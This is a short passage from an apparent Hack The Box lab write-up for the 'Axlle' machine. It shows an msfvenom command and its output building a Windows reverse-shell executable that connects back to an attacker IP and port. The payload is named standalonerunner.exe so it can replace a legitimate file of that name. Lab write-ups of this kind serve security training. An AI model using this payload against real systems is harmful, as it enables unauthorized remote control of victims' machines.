msfvenom


┌──(kali㉿kali)-[~/archive/htb/labs/axlle]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.110 LPORT=1234 -f exe -o standalonerunner.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: standalonerunner.exe

msfvenom generated a reverse shell executable to replace the standalonerunner.exe file